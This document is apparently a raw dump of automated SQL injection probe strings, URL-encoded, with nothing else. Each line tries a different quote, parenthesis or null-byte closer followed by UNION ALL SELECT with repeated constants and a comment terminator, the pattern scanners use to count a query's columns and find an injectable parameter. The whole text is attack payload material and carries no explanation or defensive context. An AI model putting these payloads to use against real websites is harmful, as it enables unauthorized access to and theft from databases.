-4011%22%29%29%29%20UNION%20ALL%20SELECT%205370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%23 -8017%22%29%29%29%20UNION%20ALL%20SELECT%206136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%2C6136%23 -4633%22%29%29%29%20UNION%20ALL%20SELECT%209671%2C9671%2C9671%2C9671%2C9671%2C9671%2C9671%2C9671%2C9671%2C9671%2C9671%2C9671%2C9671%2C9671%2C9671%2C9671%2C9671%2C9671%2C9671%2C9671%2C9671%2C9671%2C9671%2C9671%2C9671%2C9671%23 -6771%22%29%29%29%20UNION%20ALL%20SELECT%207426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%23 -9959%22%29%29%29%20UNION%20ALL%20SELECT%209357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%23 -5817%22%29%29%29%20UNION%20ALL%20SELECT%209220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%23 -1455%22%29%29%29%20UNION%20ALL%20SELECT%204021%2C4021%2C4021%2C4021%2C4021%2C4021%2C4021%2C4021%2C4021%2C4021%2C4021%2C4021%2C4021%2C4021%2C4021%2C4021%2C4021%2C4021%2C4021%2C4021%2C4021%2C4021%2C4021%2C4021%2C4021%2C4021%2C4021%2C4021%2C4021%2C4021%23 -9436%22%20UNION%20ALL%20SELECT%208563%2C8563%2C8563%2C8563%2C8563%2C8563%2C8563%2C8563%2C8563%2C8563%2C8563%2C8563%2C8563%2C8563%2C8563%2C8563%2C8563%2C8563%2C8563%2C8563%2C8563%23 -8826%22%20UNION%20ALL%20SELECT%203343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%23 -8288%22%20UNION%20ALL%20SELECT%208140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%23 -5175%22%20UNION%20ALL%20SELECT%204473%2C4473%2C4473%2C4473%2C4473%2C4473%2C4473%2C4473%2C4473%2C4473%2C4473%2C4473%2C4473%2C4473%2C4473%2C4473%2C4473%2C4473%2C4473%2C4473%2C4473%2C4473%2C4473%2C4473%23 -2390%22%20UNION%20ALL%20SELECT%205835%2C5835%2C5835%2C5835%2C5835%2C5835%2C5835%2C5835%2C5835%2C5835%2C5835%2C5835%2C5835%2C5835%2C5835%2C5835%2C5835%2C5835%2C5835%2C5835%2C5835%2C5835%2C5835%2C5835%2C5835%23 -4127%22%20UNION%20ALL%20SELECT%205518%2C5518%2C5518%2C5518%2C5518%2C5518%2C5518%2C5518%2C5518%2C5518%2C5518%2C5518%2C5518%2C5518%2C5518%2C5518%2C5518%2C5518%2C5518%2C5518%2C5518%2C5518%2C5518%2C5518%2C5518%2C5518%23 -9959%22%20UNION%20ALL%20SELECT%208962%2C8962%2C8962%2C8962%2C8962%2C8962%2C8962%2C8962%2C8962%2C8962%2C8962%2C8962%2C8962%2C8962%2C8962%2C8962%2C8962%2C8962%2C8962%2C8962%2C8962%2C8962%2C8962%2C8962%2C8962%2C8962%2C8962%23 -4943%22%20UNION%20ALL%20SELECT%202024%2C2024%2C2024%2C2024%2C2024%2C2024%2C2024%2C2024%2C2024%2C2024%2C2024%2C2024%2C2024%2C2024%2C2024%2C2024%2C2024%2C2024%2C2024%2C2024%2C2024%2C2024%2C2024%2C2024%2C2024%2C2024%2C2024%2C2024%23 -2274%22%20UNION%20ALL%20SELECT%204205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%23 -8208%22%20UNION%20ALL%20SELECT%206539%2C6539%2C6539%2C6539%2C6539%2C6539%2C6539%2C6539%2C6539%2C6539%2C6539%2C6539%2C6539%2C6539%2C6539%2C6539%2C6539%2C6539%2C6539%2C6539%2C6539%2C6539%2C6539%2C6539%2C6539%2C6539%2C6539%2C6539%2C6539%2C6539%23 -8541%25%27%29%20UNION%20ALL%20SELECT%207402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%2C7402%23 -7721%25%27%29%20UNION%20ALL%20SELECT%208914%2C8914%2C8914%2C8914%2C8914%2C8914%2C8914%2C8914%2C8914%2C8914%2C8914%2C8914%2C8914%2C8914%2C8914%2C8914%2C8914%2C8914%2C8914%2C8914%2C8914%2C8914%23 -3320%25%27%29%20UNION%20ALL%20SELECT%204358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%23 -7950%25%27%29%20UNION%20ALL%20SELECT%203080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%2C3080%23 -6880%25%27%29%20UNION%20ALL%20SELECT%207469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%23 -2722%25%27%29%20UNION%20ALL%20SELECT%206022%2C6022%2C6022%2C6022%2C6022%2C6022%2C6022%2C6022%2C6022%2C6022%2C6022%2C6022%2C6022%2C6022%2C6022%2C6022%2C6022%2C6022%2C6022%2C6022%2C6022%2C6022%2C6022%2C6022%2C6022%2C6022%23 -9487%25%27%29%20UNION%20ALL%20SELECT%209989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%23 -8136%25%27%29%20UNION%20ALL%20SELECT%206551%2C6551%2C6551%2C6551%2C6551%2C6551%2C6551%2C6551%2C6551%2C6551%2C6551%2C6551%2C6551%2C6551%2C6551%2C6551%2C6551%2C6551%2C6551%2C6551%2C6551%2C6551%2C6551%2C6551%2C6551%2C6551%2C6551%2C6551%23 -9041%25%27%29%20UNION%20ALL%20SELECT%205956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%23 -3688%25%27%29%20UNION%20ALL%20SELECT%206460%2C6460%2C6460%2C6460%2C6460%2C6460%2C6460%2C6460%2C6460%2C6460%2C6460%2C6460%2C6460%2C6460%2C6460%2C6460%2C6460%2C6460%2C6460%2C6460%2C6460%2C6460%2C6460%2C6460%2C6460%2C6460%2C6460%2C6460%2C6460%2C6460%23 -8356%25%27%29%29%20UNION%20ALL%20SELECT%207967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%23 -5248%25%27%29%29%20UNION%20ALL%20SELECT%203741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%23 -9265%25%27%29%29%20UNION%20ALL%20SELECT%204399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%23 -7812%25%27%29%29%20UNION%20ALL%20SELECT%202927%2C2927%2C2927%2C2927%2C2927%2C2927%2C2927%2C2927%2C2927%2C2927%2C2927%2C2927%2C2927%2C2927%2C2927%2C2927%2C2927%2C2927%2C2927%2C2927%2C2927%2C2927%2C2927%2C2927%23 -5650%25%27%29%29%20UNION%20ALL%20SELECT%204717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%23 -6942%25%27%29%29%20UNION%20ALL%20SELECT%203404%2C3404%2C3404%2C3404%2C3404%2C3404%2C3404%2C3404%2C3404%2C3404%2C3404%2C3404%2C3404%2C3404%2C3404%2C3404%2C3404%2C3404%2C3404%2C3404%2C3404%2C3404%2C3404%2C3404%2C3404%2C3404%23 -4268%25%27%29%29%20UNION%20ALL%20SELECT%201703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%23 -4925%25%27%29%29%20UNION%20ALL%20SELECT%206915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%23 -5767%25%27%29%29%20UNION%20ALL%20SELECT%202119%2C2119%2C2119%2C2119%2C2119%2C2119%2C2119%2C2119%2C2119%2C2119%2C2119%2C2119%2C2119%2C2119%2C2119%2C2119%2C2119%2C2119%2C2119%2C2119%2C2119%2C2119%2C2119%2C2119%2C2119%2C2119%2C2119%2C2119%2C2119%23 -2049%25%27%29%29%20UNION%20ALL%20SELECT%207143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%23 -5727%25%27%29%29%29%20UNION%20ALL%20SELECT%207320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%23 -1482%25%27%29%29%29%20UNION%20ALL%20SELECT%205085%2C5085%2C5085%2C5085%2C5085%2C5085%2C5085%2C5085%2C5085%2C5085%2C5085%2C5085%2C5085%2C5085%2C5085%2C5085%2C5085%2C5085%2C5085%2C5085%2C5085%2C5085%23 -2175%25%27%29%29%29%20UNION%20ALL%20SELECT%204022%2C4022%2C4022%2C4022%2C4022%2C4022%2C4022%2C4022%2C4022%2C4022%2C4022%2C4022%2C4022%2C4022%2C4022%2C4022%2C4022%2C4022%2C4022%2C4022%2C4022%2C4022%2C4022%23 -8247%25%27%29%29%29%20UNION%20ALL%20SELECT%203449%2C3449%2C3449%2C3449%2C3449%2C3449%2C3449%2C3449%2C3449%2C3449%2C3449%2C3449%2C3449%2C3449%2C3449%2C3449%2C3449%2C3449%2C3449%2C3449%2C3449%2C3449%2C3449%2C3449%23 -4459%25%27%29%29%29%20UNION%20ALL%20SELECT%208964%2C8964%2C8964%2C8964%2C8964%2C8964%2C8964%2C8964%2C8964%2C8964%2C8964%2C8964%2C8964%2C8964%2C8964%2C8964%2C8964%2C8964%2C8964%2C8964%2C8964%2C8964%2C8964%2C8964%2C8964%23 -7790%25%27%29%29%29%20UNION%20ALL%20SELECT%209146%2C9146%2C9146%2C9146%2C9146%2C9146%2C9146%2C9146%2C9146%2C9146%2C9146%2C9146%2C9146%2C9146%2C9146%2C9146%2C9146%2C9146%2C9146%2C9146%2C9146%2C9146%2C9146%2C9146%2C9146%2C9146%23 -7733%25%27%29%29%29%20UNION%20ALL%20SELECT%206953%2C6953%2C6953%2C6953%2C6953%2C6953%2C6953%2C6953%2C6953%2C6953%2C6953%2C6953%2C6953%2C6953%2C6953%2C6953%2C6953%2C6953%2C6953%2C6953%2C6953%2C6953%2C6953%2C6953%2C6953%2C6953%2C6953%23 -7875%25%27%29%29%29%20UNION%20ALL%20SELECT%206911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%23 -5391%25%27%29%29%29%20UNION%20ALL%20SELECT%209948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%2C9948%23 -5467%25%27%29%29%29%20UNION%20ALL%20SELECT%204739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%2C4739%23 -7229%25%27%20UNION%20ALL%20SELECT%202267%2C2267%2C2267%2C2267%2C2267%2C2267%2C2267%2C2267%2C2267%2C2267%2C2267%2C2267%2C2267%2C2267%2C2267%2C2267%2C2267%2C2267%2C2267%2C2267%2C2267%23 -9980%25%27%20UNION%20ALL%20SELECT%202542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%23 -1415%25%27%20UNION%20ALL%20SELECT%205729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%23 -2367%25%27%20UNION%20ALL%20SELECT%203706%2C3706%2C3706%2C3706%2C3706%2C3706%2C3706%2C3706%2C3706%2C3706%2C3706%2C3706%2C3706%2C3706%2C3706%2C3706%2C3706%2C3706%2C3706%2C3706%2C3706%2C3706%2C3706%2C3706%23 -7816%25%27%20UNION%20ALL%20SELECT%204752%2C4752%2C4752%2C4752%2C4752%2C4752%2C4752%2C4752%2C4752%2C4752%2C4752%2C4752%2C4752%2C4752%2C4752%2C4752%2C4752%2C4752%2C4752%2C4752%2C4752%2C4752%2C4752%2C4752%2C4752%23 -8787%25%27%20UNION%20ALL%20SELECT%204801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%23 -2775%25%27%20UNION%20ALL%20SELECT%209342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%23 -9646%25%27%20UNION%20ALL%20SELECT%201790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%23 -7431%25%27%20UNION%20ALL%20SELECT%203241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%23 -4530%25%27%20UNION%20ALL%20SELECT%203011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%23 -2233%00%27%29%20UNION%20ALL%20SELECT%203077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%23 -7732%00%27%29%20UNION%20ALL%20SELECT%206402%2C6402%2C6402%2C6402%2C6402%2C6402%2C6402%2C6402%2C6402%2C6402%2C6402%2C6402%2C6402%2C6402%2C6402%2C6402%2C6402%2C6402%2C6402%2C6402%2C6402%2C6402%23 -9211%00%27%29%20UNION%20ALL%20SELECT%209111%2C9111%2C9111%2C9111%2C9111%2C9111%2C9111%2C9111%2C9111%2C9111%2C9111%2C9111%2C9111%2C9111%2C9111%2C9111%2C9111%2C9111%2C9111%2C9111%2C9111%2C9111%2C9111%23 -1966%00%27%29%20UNION%20ALL%20SELECT%208298%2C8298%2C8298%2C8298%2C8298%2C8298%2C8298%2C8298%2C8298%2C8298%2C8298%2C8298%2C8298%2C8298%2C8298%2C8298%2C8298%2C8298%2C8298%2C8298%2C8298%2C8298%2C8298%2C8298%23 -1528%00%27%29%20UNION%20ALL%20SELECT%209059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%23 -7901%00%27%29%20UNION%20ALL%20SELECT%207586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%23 -4138%00%27%29%20UNION%20ALL%20SELECT%207888%2C7888%2C7888%2C7888%2C7888%2C7888%2C7888%2C7888%2C7888%2C7888%2C7888%2C7888%2C7888%2C7888%2C7888%2C7888%2C7888%2C7888%2C7888%2C7888%2C7888%2C7888%2C7888%2C7888%2C7888%2C7888%2C7888%23 -2470%00%27%29%20UNION%20ALL%20SELECT%201943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%23 -9942%00%27%29%20UNION%20ALL%20SELECT%204740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%2C4740%23 -2641%00%27%29%20UNION%20ALL%20SELECT%205677%2C5677%2C5677%2C5677%2C5677%2C5677%2C5677%2C5677%2C5677%2C5677%2C5677%2C5677%2C5677%2C5677%2C5677%2C5677%2C5677%2C5677%2C5677%2C5677%2C5677%2C5677%2C5677%2C5677%2C5677%2C5677%2C5677%2C5677%2C5677%2C5677%23 -5606%00%27%20UNION%20ALL%20SELECT%201750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%23 -1020%00%27%20UNION%20ALL%20SELECT%205521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%23 -4263%00%27%20UNION%20ALL%20SELECT%204381%2C4381%2C4381%2C4381%2C4381%2C4381%2C4381%2C4381%2C4381%2C4381%2C4381%2C4381%2C4381%2C4381%2C4381%2C4381%2C4381%2C4381%2C4381%2C4381%2C4381%2C4381%2C4381%23 -5484%00%27%20UNION%20ALL%20SELECT%203303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%2C3303%23 -9273%00%27%20UNION%20ALL%20SELECT%201899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%23 -4601%00%27%20UNION%20ALL%20SELECT%206932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%2C6932%23 -1246%00%27%20UNION%20ALL%20SELECT%201132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%23 -6336%00%27%20UNION%20ALL%20SELECT%208696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%23 -8589%00%27%20UNION%20ALL%20SELECT%202895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%23 -3387%00%27%20UNION%20ALL%20SELECT%209402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%23 -2096%27%29%20WHERE%207143%3D7143%20UNION%20ALL%20SELECT%207143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%2C7143%23 -9219%27%29%20WHERE%205148%3D5148%20UNION%20ALL%20SELECT%205148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%23 -3965%27%29%20WHERE%207346%3D7346%20UNION%20ALL%20SELECT%207346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%23 -2484%27%29%20WHERE%206283%3D6283%20UNION%20ALL%20SELECT%206283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%2C6283%23 -4955%27%29%20WHERE%206210%3D6210%20UNION%20ALL%20SELECT%206210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%23 -7651%27%29%20WHERE%204725%3D4725%20UNION%20ALL%20SELECT%204725%2C4725%2C4725%2C4725%2C4725%2C4725%2C4725%2C4725%2C4725%2C4725%2C4725%2C4725%2C4725%2C4725%2C4725%2C4725%2C4725%2C4725%2C4725%2C4725%2C4725%2C4725%2C4725%2C4725%2C4725%2C4725%23 -4961%27%29%20WHERE%208640%3D8640%20UNION%20ALL%20SELECT%208640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%23 -9164%27%29%20WHERE%201128%3D1128%20UNION%20ALL%20SELECT%201128%2C1128%2C1128%2C1128%2C1128%2C1128%2C1128%2C1128%2C1128%2C1128%2C1128%2C1128%2C1128%2C1128%2C1128%2C1128%2C1128%2C1128%2C1128%2C1128%2C1128%2C1128%2C1128%2C1128%2C1128%2C1128%2C1128%2C1128%23 -9620%27%29%20WHERE%206366%3D6366%20UNION%20ALL%20SELECT%206366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%23 -7271%27%29%20WHERE%206001%3D6001%20UNION%20ALL%20SELECT%206001%2C6001%2C6001%2C6001%2C6001%2C6001%2C6001%2C6001%2C6001%2C6001%2C6001%2C6001%2C6001%2C6001%2C6001%2C6001%2C6001%2C6001%2C6001%2C6001%2C6001%2C6001%2C6001%2C6001%2C6001%2C6001%2C6001%2C6001%2C6001%2C6001%23 -1160%22%29%20WHERE%207269%3D7269%20UNION%20ALL%20SELECT%207269%2C7269%2C7269%2C7269%2C7269%2C7269%2C7269%2C7269%2C7269%2C7269%2C7269%2C7269%2C7269%2C7269%2C7269%2C7269%2C7269%2C7269%2C7269%2C7269%2C7269%23 -7076%22%29%20WHERE%204869%3D4869%20UNION%20ALL%20SELECT%204869%2C4869%2C4869%2C4869%2C4869%2C4869%2C4869%2C4869%2C4869%2C4869%2C4869%2C4869%2C4869%2C4869%2C4869%2C4869%2C4869%2C4869%2C4869%2C4869%2C4869%2C4869%23 -9275%22%29%20WHERE%206516%3D6516%20UNION%20ALL%20SELECT%206516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%23 -2596%22%29%20WHERE%207555%3D7555%20UNION%20ALL%20SELECT%207555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%23 -5587%22%29%20WHERE%208245%3D8245%20UNION%20ALL%20SELECT%208245%2C8245%2C8245%2C8245%2C8245%2C8245%2C8245%2C8245%2C8245%2C8245%2C8245%2C8245%2C8245%2C8245%2C8245%2C8245%2C8245%2C8245%2C8245%2C8245%2C8245%2C8245%2C8245%2C8245%2C8245%23 -2464%22%29%20WHERE%204013%3D4013%20UNION%20ALL%20SELECT%204013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%23 -7912%22%29%20WHERE%206339%3D6339%20UNION%20ALL%20SELECT%206339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%23 -8237%22%29%20WHERE%208726%3D8726%20UNION%20ALL%20SELECT%208726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%23 -9923%22%29%20WHERE%203597%3D3597%20UNION%20ALL%20SELECT%203597%2C3597%2C3597%2C3597%2C3597%2C3597%2C3597%2C3597%2C3597%2C3597%2C3597%2C3597%2C3597%2C3597%2C3597%2C3597%2C3597%2C3597%2C3597%2C3597%2C3597%2C3597%2C3597%2C3597%2C3597%2C3597%2C3597%2C3597%2C3597%23 